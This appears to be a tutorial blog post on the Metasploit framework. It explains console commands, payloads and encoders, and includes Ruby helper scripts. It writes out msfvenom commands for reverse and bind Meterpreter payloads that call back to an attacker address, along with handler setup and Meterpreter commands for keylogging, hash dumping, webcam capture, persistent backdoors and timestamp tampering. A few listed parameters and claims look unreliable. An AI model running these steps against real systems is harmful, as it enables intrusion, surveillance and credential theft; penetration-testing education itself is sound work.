Metasploit: The Ultimate Guide for Penetration Testing

Metasploit is the world’s most popular open-source penetration testing framework. It provides a comprehensive collection of tools and resources for identifying, exploiting, and mitigating security vulnerabilities. Whether you’re a seasoned security professional or just starting out in the field, Metasploit is a valuable tool that can help you improve your security posture.

What is Metasploit?

Metasploit is a modular framework that allows you to:

  • Discover vulnerabilities: Metasploit includes a vast database of exploits, vulnerabilities, and payloads that can be used to identify potential weaknesses in your systems.
  • Exploit vulnerabilities: Once you’ve identified a vulnerability, Metasploit can help you exploit it to gain unauthorized access to a system.
  • Develop custom exploits: Metasploit provides a powerful scripting language that allows you to develop your own custom exploits.
  • Manage your pentesting workflow: Metasploit includes a number of tools and features that can help you manage your pentesting workflow, such as a project management system and a reporting tool.

Benefits of using Metasploit

There are several benefits to using Metasploit for penetration testing:

  • Open-source: Metasploit is free to use and open-source, which means that anyone can contribute to its development. This makes it a constantly evolving platform with a large and active community of users.
  • Comprehensive: Metasploit includes a vast database of exploits, vulnerabilities, and payloads, making it one of the most comprehensive penetration testing tools available.
  • Flexible: Metasploit is modular and can be customized to meet your specific needs. You can add your own exploits, payloads, and modules to the framework.
  • Easy to use: Metasploit has a user-friendly interface and command-line tools that make it easy to use for both beginners and experienced penetration testers.
  • Well-documented: Metasploit is well-documented with extensive online resources, tutorials, and guides that can help you get started and learn how to use the framework effectively.

Getting started with Metasploit

There are two main ways to get started with Metasploit:

  • Download and install the Metasploit Framework: Metasploit can be installed on various platforms, including Linux, Windows, and macOS. Follow the installation guide on the official Metasploit website, or use a distribution such as Kali Linux that ships with Metasploit pre-installed.

  • Use Metasploit online: Rapid7, the company that owns Metasploit, offers a free online version of the framework that you can access through your web browser. This is a great option if you want to try out Metasploit without having to install anything on your computer.

Once you have access to Metasploit, you can start exploring the different modules and tools that are available. The best way to learn how to use Metasploit is to start with the basics and then gradually work your way up to more advanced concepts.

Components of Metasploit

  • Framework: The core of Metasploit, providing a platform for vulnerability analysis and exploitation.

  • Database: Allows users to store gathered information and results for later analysis and reporting.

  • Exploits: Think of an exploit as the tool or technique used to take advantage of a vulnerability in a system or software. It’s like finding the key to unlock a door. An exploit helps gain unauthorized access or control over a system by exploiting a specific weakness or security flaw.

  • Payloads: A payload is what runs after the exploit has successfully breached the system. It’s the ‘package’ of instructions or actions that the attacker wants to execute on the compromised system. It could be anything from installing malware, gaining remote access, or capturing data, to performing specific tasks on the targeted system.

    In essence, the exploit is the method used to get into the system, while the payload is what the attacker wants to do once inside—like opening the door with the key (exploit) and then delivering a package (payload) inside the room.

  • Modules: A collection of payloads, exploits, auxiliary modules, and post-exploitation modules.

  • Auxiliary Modules: Auxiliary modules in Metasploit are versatile tools used for tasks like scanning, reconnaissance, vulnerability identification, and even limited attacks like DoS. They help gather information, assess vulnerabilities, and perform actions beyond traditional exploitation, enriching the assessment of a system’s security.

  • Metasploit Encoders: Encoders in Metasploit are used to transform payloads into different formats to evade detection by antivirus software or intrusion detection systems. They encode the payload, making it harder for security mechanisms to recognize and block it. Encoders basically obfuscate the payload without changing its functionality.

  • Evasion Techniques: Evasion techniques in Metasploit involve methods to bypass or evade security measures such as firewalls, intrusion detection systems, or antivirus software. These techniques aim to hide the true nature of an attack or payload, making it difficult for security systems to detect and block it.

  • NOPs (No-Operation Sleds): NOP sleds are used in exploitation to ensure that the execution flow lands at the start of the payload. They consist of a series of no-operation instructions (NOPs) that lead to the actual exploit code. This technique helps in aligning the execution pointer to the beginning of the payload.

  • Post-Exploitation Modules: Post-exploitation modules in Metasploit provide functionalities for maintaining access and control over a compromised system after successful exploitation. These modules allow an attacker to perform various actions on the target system, such as extracting information, escalating privileges, installing backdoors, or executing additional commands.

Interface Overview

  • msfconsole: The command-line interface providing access to the framework’s functionalities.
  • msfvenom: For generating various payloads.
  • msfdb: Handles the Metasploit database.

Basic Commands

  • use <module>: Select a module.
  • show options: View the options (required and optional) of the selected module.
  • set <option> <value>: Set values for module options.
  • exploit or run: Execute the selected module.

Metasploit Console

The Metasploit console is the primary interface for interacting with the framework. The console provides a command-line interface that allows you to execute commands, view information about modules and tools, and launch attacks.

The Metasploit console is a powerful tool that can be used to perform a wide range of penetration testing tasks. However, it can be difficult to learn and use for beginners. To help you get started, here are some of the most common Metasploit console commands:

Common Metasploit Console Commands

Command         Description
search          Searches for modules based on specific keywords
info            Displays information about a specific module
use             Loads a specific module
show options    Displays the options for a loaded module
set             Sets the value of a module option
exploit         Executes a loaded exploit
run             Executes a loaded auxiliary module
back            Unloads the current module
exit            Exits the Metasploit console

Metasploit Commands Explained

Here are some of the most common Metasploit commands explained in more detail:

Search: The search command searches for modules based on specific keywords. For example, the following command lists all exploits that target Windows systems:

search type:exploit platform:windows

Every module returned by search carries a rank that indicates how reliable and impactful the exploit is. The ranks are listed below:

  • Excellent: Exploits categorized as excellent would typically demonstrate exceptional reliability, high impact, widespread usage, and effectiveness across various environments. These exploits are considered top-tier due to their reliability, impact, and popularity among security professionals.

  • Great/Good: These categories might encompass exploits that perform reliably in most scenarios, have significant impact, and are commonly used within the community. They might lack the widespread usage or impact of “excellent” exploits but are still considered highly effective.

  • Normal/Average: Exploits falling into this category might be reliable in specific scenarios but could lack widespread impact or usage. They might be considered decent options but may not be the first choice for high-stakes penetration tests or assessments.

  • Low: Exploits labeled as low might have limited reliability, lower impact, or might be less commonly used due to various limitations. They might work in specific, constrained environments but are not reliable or impactful across a broad spectrum.

  • Manual: This category could encompass exploits that require significant manual intervention, customization, or expertise to execute successfully. These exploits might not have a straightforward implementation process and might be less commonly used due to their complexity.

A sample is shown below, searching for the word exploit with the search command:

msf6 > search exploit

# Name Disclosure Date Rank Check Description
0 auxiliary/dos/http/cable_haunt_websocket_dos 2020-01-07 normal No “Cablehaunt” Cable Modem WebSocket DoS
1 exploit/linux/local/cve_2021_3493_overlayfs 2021-04-12 great Yes 2021 Ubuntu Overlayfs LPE
2 exploit/windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow
3 exploit/windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow
4 exploit/windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities

You can also combine multiple parameters, for example search exploit rank:gte500 (modules matching the word exploit whose numeric rank is greater than or equal to 500).
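To make the rank filter concrete, here is an added example (not code from the original post or from the Metasploit project) that parses msfconsole search output into records and applies the same kind of filter that rank:gte500 performs inside the framework. The rank-to-number mapping is the one Metasploit uses (manual 0, low 100, average 200, normal 300, good 400, great 500, excellent 600); the sample output is the one shown above, typed in as a constructed string.

```ruby
# Added example: parse `search` output rows and filter them by module type
# and numeric rank, mirroring `search type:<type> rank:gte<n>`.
# Rank names map to the numeric values Metasploit uses internally.
RANK_VALUE = {
  "manual"    => 0,
  "low"       => 100,
  "average"   => 200,
  "normal"    => 300,
  "good"      => 400,
  "great"     => 500,
  "excellent" => 600,
}.freeze

# Constructed sample: the search output shown on this page.
SAMPLE_SEARCH_OUTPUT = <<~OUT
  #  Name                                          Disclosure Date  Rank       Check  Description
  0  auxiliary/dos/http/cable_haunt_websocket_dos  2020-01-07       normal     No     "Cablehaunt" Cable Modem WebSocket DoS
  1  exploit/linux/local/cve_2021_3493_overlayfs   2021-04-12       great      Yes    2021 Ubuntu Overlayfs LPE
  2  exploit/windows/ftp/32bitftp_list_reply       2010-10-12       good       No     32bit FTP Client Stack Buffer Overflow
  3  exploit/windows/ftp/3cdaemon_ftp_user         2005-01-04       average    Yes    3Com 3CDaemon 2.0 FTP Username Overflow
  4  exploit/windows/scada/igss9_misc              2011-03-24       excellent  No     7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
OUT

# One row of search output. The disclosure date is optional because real
# output leaves it blank for some modules.
SearchRow = Struct.new(:index, :name, :date, :rank, :check, :description) do
  # Module type is the first path component: exploit, auxiliary, post, ...
  def type
    name.split("/", 2).first
  end

  def rank_value
    RANK_VALUE.fetch(rank)
  end
end

ROW_RE = /\A\s*(\d+)\s+(\S+)\s+(\d{4}-\d{2}-\d{2})?\s*(manual|low|average|normal|good|great|excellent)\s+(Yes|No)\s+(.*)\z/

# Turns the text of a search listing into SearchRow records, skipping the
# header line and anything that does not look like a result row.
def parse_search_output(text)
  text.each_line.filter_map do |line|
    m = ROW_RE.match(line.chomp) or next
    SearchRow.new(m[1].to_i, m[2], m[3], m[4], m[5], m[6].strip)
  end
end

# Emulates `search type:<type> rank:gte<n>`: keep rows of the given module
# type whose numeric rank is at least min_rank. min_rank may be a rank name
# ("great") or a number (500).
def filter_rows(rows, type: nil, min_rank: 0)
  threshold = min_rank.is_a?(Integer) ? min_rank : RANK_VALUE.fetch(min_rank)
  rows.select { |r| (type.nil? || r.type == type) && r.rank_value >= threshold }
end
```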

Search example:

  • search windows

  • search exploit

  • search exploit vsftpd

  • search payload meterpreter

  • search auxiliary scanner

  • search post/windows

  • search type:post description

  • search name:Microsoft type:exploit rank:great

  • search platform:Windows type:exploit description:smb rank:excellent

  • search platform:Windows type:exploit description:dcom rank:gte600

  • search exploit/windows

  • search exploit/windows “buffer overflow”

Info: The info command displays information about a specific module. You can also continue from the search output: to view details about the result numbered 5, type info 5 directly, or use the full module path as shown below.

For example, the following command displays information about the exploit module “ms08_067_netapi”:

info exploit/windows/smb/ms08_067_netapi

Use: The use command loads a specific module. After a search, you can refer to a result by its number, for example use 4 to load the 4th module in the output. The following command loads the exploit module “ms08_067_netapi” by its full path:

use exploit/windows/smb/ms08_067_netapi

Show options: The show options command displays the options of the currently loaded module; it takes no module argument. For example, after loading the exploit module “ms08_067_netapi”, the following displays its options:

use exploit/windows/smb/ms08_067_netapi
show options

Set: The set command sets the value of a module option. For example, the following command sets the RHOST option of the exploit module “ms08_067_netapi” to the IP address 192.168.1.1 (current Metasploit versions name the target option RHOSTS; check show options for the exact name):

set RHOST 192.168.1.1

Exploit: The exploit command executes a loaded exploit. For example, the following command executes the exploit module “ms08_067_netapi” once it is loaded:

exploit

Run: The run command executes a loaded auxiliary module; like exploit, it takes no module argument. For example, the following loads the TCP port scanner module and runs it:

use auxiliary/scanner/portscan/tcp
run

Once the exploit and payload are configured, either exploit or run launches the module.

Back: The back command unloads the current module. This is useful if you want to switch to a different module.

back

Exit: The exit command exits the Metasploit console.

exit

Show: After you’ve selected the exploit and payload, you can use the show command to see what to configure next. Some examples:

show targets - lists the targets (operating system versions, service packs) the loaded module supports.

show options - shows all the options for the loaded module.

show payloads - lists the payloads compatible with the loaded module.

grep “reverse_tcp” show payloads - in a Linux shell you would pipe the command into grep (command | grep pattern), but in msfconsole grep comes first, followed by the command whose output it filters.

These are just a few of the most common Metasploit console commands. There are many other commands available, and you can learn more about them by reading the Metasploit documentation.

Sample session:

search dcom
use 4
grep "reverse_tcp" show payloads
set payload 81
show options
set LHOST <attacker_ip>
set LPORT <port>
exploit

Here use 4 loads the fourth search result, set payload 81 selects the payload by the number it carries in the payload listing, show options shows the options required by the selected module and payload, and either exploit or run will launch the module.

background: move the current session to the background after you’re connected to a target, returning you to the msfconsole prompt.

sessions: list all sessions. sessions -i <session id>: interact with a specific session.

sessions -C screenshot -i 2,3: run the screenshot Meterpreter command on sessions 2 and 3.

Metasploit Parameters Explained

Here are some of the most important parameter categories and examples:

Target Parameters:

  • RHOST: The IP address or hostname of the target system.
  • RPORT: The port number of the target system.
  • TARGET: Target system specification.
  • VERBOSE: Enable verbose output for detailed information.
  • THREADS: Number of concurrent threads to use.

Payload Parameters:

  • PAYLOAD: The name of the payload to be delivered.
  • LHOST: The IP address or hostname of the attacker system to receive the connection. In short, LHOST in a reverse payload sets the destination IP address to which the compromised system will connect or send information back to after being exploited.
  • LPORT: The port number on the attacker system to receive the connection.

Exploit Parameters:

  • VERBOSE: Enables verbose output for the exploit.
  • NOPCOUNT: The number of NOP instructions to insert into the exploit.
  • SSL: Enables SSL encryption for the exploit.

Auxiliary Module Parameters:

  • THREADS: The number of threads to use for the auxiliary module.
  • DEPTH: The depth of the scan for the auxiliary module.
  • FILTER: The filter to apply to the results of the auxiliary module.

Encoder Parameters:

  • ENCODER: The name of the encoder to use.
  • BADCHARS: The characters to be avoided by the encoder.
  • PASSENC: The password to be used for the encoder.

Nops Parameters:

  • NOPSIZE: The size of the NOP sled.
  • NOREPEAT: Prevents the NOP sled from repeating.

These are just a few examples of the many parameters used in Metasploit. You can find a complete list of parameters for each module in the Metasploit documentation.

Advanced Metasploit Techniques

Once you’re comfortable with the basics of Metasploit, you can start exploring some of the more advanced techniques. Here are a few examples:

  • Developing custom exploits: Metasploit provides a powerful scripting language that allows you to develop your own custom exploits. This is a great way to target vulnerabilities that are not covered by existing exploits.
  • Using post modules: Post modules can be used to interact with a system after an exploit has been successful. This allows you to maintain access to the system, steal data, or escalate privileges.
  • Automating tasks: Metasploit can be used to automate a variety of tasks, such as scanning for vulnerabilities, launching exploits, and gathering information. This can save you a lot of time and effort.

Payloads and Encoders:

Understanding payloads and encoders is crucial for delivering attacks successfully. Payloads are the malicious code executed on the target system after an exploit has been successful. Different payloads serve different purposes, such as:

  • Reverse shells: Create a connection back to the attacker’s machine for remote access.
  • Bind shells: Listen on a specific port on the target machine for connections.
  • Meterpreter: A powerful post-exploitation framework that enables various actions.
  • File system access: Allows for download, upload, and manipulation of files.

Encoders are used to obfuscate payloads, making them less likely to be matched by signature-based security software. Some common encoding techniques include:

  • Alphanumeric (“alpha”) encoding: Rewrites the payload so it consists only of printable alphanumeric bytes, letting it blend in with regular text or data.
  • XOR encoding: Transforms the payload bytes with an XOR operation against a key; a small decoder stub restores the original bytes at run time.
  • Shift encoding: Shifts the bytes of the payload by a specific value.

Choosing the right payload and encoder for a specific attack depends on various factors such as target system, desired outcome, and security controls in place.

Auxiliary Modules:

Auxiliary modules are versatile tools used for various tasks besides exploiting vulnerabilities. Some common functions include:

  • Scanning: Identifying open ports, services, and vulnerabilities on target systems.
  • Gathering information: Collecting information about the target system, such as usernames, operating system, and network details.
  • Denial-of-service (DoS): Disrupting services or applications on the target system.
  • Maintaining access: Establishing persistence on the target system for long-term control.

Post Modules:

Post modules come into play after successfully exploiting a vulnerability and gaining initial access. They offer functionalities like:

  • Privilege escalation: Elevating privileges to gain higher access levels on the target system.
  • Lateral movement: Moving across the network to other vulnerable systems.
  • Data exfiltration: Stealing sensitive data from the target system.
  • Credential harvesting: Obtaining user credentials for further access and privilege escalation.

Post modules empower attackers to perform various actions beyond simply exploiting a vulnerability, allowing them to achieve their objectives like data theft or maintaining long-term control over the compromised system.

Automating Tasks with Metasploit:

Metasploit offers scripting capabilities to automate repetitive tasks, saving time and effort. Scripts can be written in various languages like Ruby and Python, enabling automated scanning, exploitation, and post-exploitation activities.

Metasploit Payloads

Payloads are the malicious code that is delivered to a victim system after an exploit has been successful. Payloads can be used for a variety of purposes, such as:

  • Maintaining access to the system: Payloads can be used to install backdoors on a system, which allow you to maintain access to the system even after the exploit has been patched.
  • Stealing data: Payloads can be used to steal data from a victim system, such as usernames, passwords, and financial information.
  • Escalating privileges: Payloads can be used to escalate privileges on a victim system, which allows you to gain more control over the system.
  • Denying service: Payloads can be used to launch denial-of-service attacks, which can prevent legitimate users from accessing a system.

Metasploit includes a large database of payloads that cover a wide range of purposes. You can choose the payload that best suits your needs based on your goals for the penetration test.

Types of Payloads

There are two main types of payloads:

  • Single-stage payloads: Single-stage payloads are self-contained and do not require any additional files to be downloaded to the victim system. They are typically used for simple attacks where you only need to gain initial access to the system.
  • Staged payloads: Staged payloads consist of two parts: a small stub loader and a larger payload file. The stub loader is downloaded to the victim system first, and it then downloads the larger payload file from the attacker’s system. Staged payloads are typically used for more complex attacks where you need to install a backdoor or steal data.

Choosing a Payload

When choosing a payload, you need to consider a number of factors, such as:

  • The target operating system: Different payloads are designed to work on different operating systems.
  • The architecture of the target system: Different payloads are designed to work on different architectures, such as x86 and x64.
  • Your goals for the penetration test: Different payloads are designed for different purposes.
  • The level of risk: Some payloads are more likely to be detected by security software than others.

Once you have considered these factors, you can choose the payload that best suits your needs.

Generating a Payload

Generate a reverse shell payload with msfvenom:

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<attacker_port> -f <format> -o <output_file>

Metasploit Resources

There are a number of great resources available online that can help you learn more about Metasploit payloads. Here are a few of my favorites:

Meterpreter

Meterpreter is an advanced, post-exploitation payload in the Metasploit Framework, allowing an attacker to control a compromised system fully. It’s designed for various penetration testing tasks, offering a range of commands to interact with the target system. Here’s a table of some useful Meterpreter commands:

Command         Description                                                Example
sysinfo         Retrieve system information                                sysinfo
shell           Gain an interactive shell on the target                    shell
upload          Upload a file to the target system                         upload /local/file.txt /remote/path/file.txt
download        Download a file from the target system                     download /remote/file.txt /local/path/file.txt
execute         Execute a program on the target system                     execute -f cmd.exe -i -H (add -a "/c <command>" to pass arguments)
screenshot      Take a screenshot of the target’s desktop                  screenshot
keyscan_start   Start logging keys typed on the target                     keyscan_start
keyscan_dump    Dump the captured keystrokes                               keyscan_dump
getuid          Show the user the session is running as                    getuid
getsystem       Attempt to escalate privileges to SYSTEM                   getsystem
ps              List running processes on the target                       ps
download_all    Download all files from a directory                        download_all /remote/dir /local/path
webcam_list     List available webcams on the target                       webcam_list
webcam_snap     Take a snapshot using the webcam                           webcam_snap
migrate         Migrate Meterpreter into another process                   migrate <PID>
hashdump        Dump password hashes from the target system                hashdump
persistence     Create a persistent backdoor (Meterpreter script)          run persistence -U -i 5 -p 4444 -r <attacker_IP> (Windows)
portfwd         Forward a port through the target                          portfwd add -l 3389 -p 3389 -r <target_IP>
timestomp       View or modify file timestamps to evade detection          timestomp <file> -v (shows the current timestamps)

These commands can be powerful in the hands of a penetration tester or an ethical hacker but should only be used on systems where you have proper authorization. Always ensure you have permission to perform security testing or any actions on the targeted systems.

Meterpreter Bind TCP

A Meterpreter bind shell is a payload that opens a listening port on the compromised system. When the target executes the payload, it waits for the attacker’s handler to connect to that port; once the handler connects, the attacker gets an interactive Meterpreter session on the target. This is the opposite direction from a reverse shell, where the target connects out to the attacker.

Here’s a general outline of how you might set up a Meterpreter bind shell using the Metasploit Framework:

  1. Generate Payload: Use Metasploit’s msfvenom tool to generate the Meterpreter bind shell payload. For example:

    msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o bind_shell_payload.exe

    This command generates a Windows Meterpreter bind shell payload, listening on port 4444, and saves it as bind_shell_payload.exe.

  2. Set Up Handler: Start Metasploit and configure a handler that connects to the port the payload opened on the target:

    use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set RHOST <target_ip>
    set LPORT 4444
    exploit

    With a bind payload the handler does not listen: it connects to the target’s IP address (RHOST) on port 4444, so RHOST must be set and the payload must already be running on the target when you run exploit.

  3. Execute on Target: Transfer the generated bind_shell_payload.exe to the target system and execute it. With the payload listening on the target, run the handler from step 2; it connects to port 4444 and you receive a Meterpreter session.

Meterpreter Reverse Shell

A reverse shell is a type of shell session initiated from a target machine back to an attacker-controlled system. It’s a powerful technique used in penetration testing or hacking scenarios to gain control and access to a compromised system. You set up a reverse shell when you need the victim to make a connection back to you.

A Meterpreter reverse shell is a powerful payload used to establish a connection from the target machine back to the attacker’s system. This allows the attacker to gain control over the compromised system. Here’s a general guide on how to set up a Meterpreter reverse shell using the Metasploit Framework:

  1. Generate Payload: Use msfvenom in Metasploit to create the reverse shell payload. For example, to generate a Windows reverse TCP Meterpreter payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o reverse_shell_payload.exe

    Replace attacker_ip with your actual IP address. This command creates a Windows Meterpreter reverse shell payload that connects back to your machine’s IP address on port 4444 and saves it as reverse_shell_payload.exe.

  2. Set Up Listener: In Metasploit, configure a listener to catch the incoming connection:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST attacker_ip
    set LPORT 4444
    exploit

    Again, replace attacker_ip with your actual IP address. This sets up a listener to catch the incoming reverse shell connection.

  3. Execute on Target: Transfer the generated reverse_shell_payload.exe to the target system and execute it. Once the payload is executed on the target system, it establishes a connection back to your machine, providing you with a Meterpreter session.
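The bind and reverse walkthroughs above differ only in which side connects, and so in which option the handler needs (RHOST for bind_tcp, LHOST for reverse_tcp). As an added example, not code from the original post or from the Metasploit project, the following Ruby generates the handler commands as a resource script and refuses configurations that are missing the option their direction requires or carry an invalid port. Assumptions: the payload names, LHOST/LPORT/RHOST and the resource-script form shown above; handler.rc is a constructed file name.

```ruby
require "ipaddr"

# Added example: build an exploit/multi/handler resource script from the
# payload name and connection options, validating them first.
class HandlerConfigError < StandardError; end

# A reverse payload connects from the target to LHOST:LPORT, so the handler
# listens. A bind payload listens on the target, so the handler connects to
# RHOST:LPORT. The direction is read from the payload name.
def payload_direction(payload)
  case payload
  when %r{/reverse_} then :reverse
  when %r{/bind_}    then :bind
  else raise HandlerConfigError, "cannot tell bind from reverse for #{payload}"
  end
end

def valid_port?(port)
  port.is_a?(Integer) && port.between?(1, 65_535)
end

# Accepts IPv4/IPv6 literals only; hostnames are rejected so that a
# placeholder such as "attacker_ip" left in by mistake is caught.
def valid_host?(host)
  IPAddr.new(host)
  true
rescue IPAddr::InvalidAddressError
  false
end

# Returns the lines of a resource script for exploit/multi/handler.
# exit_on_session: false adds `set ExitOnSession false` and `exploit -j`, which
# keep the handler running as a background job so it can accept more than one
# session instead of stopping after the first.
def handler_script(payload:, lport:, lhost: nil, rhost: nil, exit_on_session: true)
  raise HandlerConfigError, "LPORT must be 1-65535" unless valid_port?(lport)
  lines = ["use exploit/multi/handler", "set payload #{payload}"]
  case payload_direction(payload)
  when :reverse
    raise HandlerConfigError, "reverse payload needs a valid LHOST" unless lhost && valid_host?(lhost)
    lines << "set LHOST #{lhost}"
  when :bind
    raise HandlerConfigError, "bind payload needs a valid RHOST" unless rhost && valid_host?(rhost)
    lines << "set RHOST #{rhost}"
  end
  lines << "set LPORT #{lport}"
  lines << "set ExitOnSession false" unless exit_on_session
  lines << (exit_on_session ? "exploit" : "exploit -j")
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample values; write the result to handler.rc and load it
  # with `msfconsole -r handler.rc`.
  script = handler_script(payload: "windows/meterpreter/reverse_tcp",
                          lhost: "10.0.0.5", lport: 4444, exit_on_session: false)
  File.write("handler.rc", script.join("\n") + "\n")
  puts script
end
```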

Conclusion

Metasploit is a powerful and versatile framework that can be used for a wide range of penetration testing tasks. By understanding the basics of the framework, exploring advanced techniques, and practicing ethical hacking principles, you can leverage Metasploit to improve your security posture and become a proficient security professional.
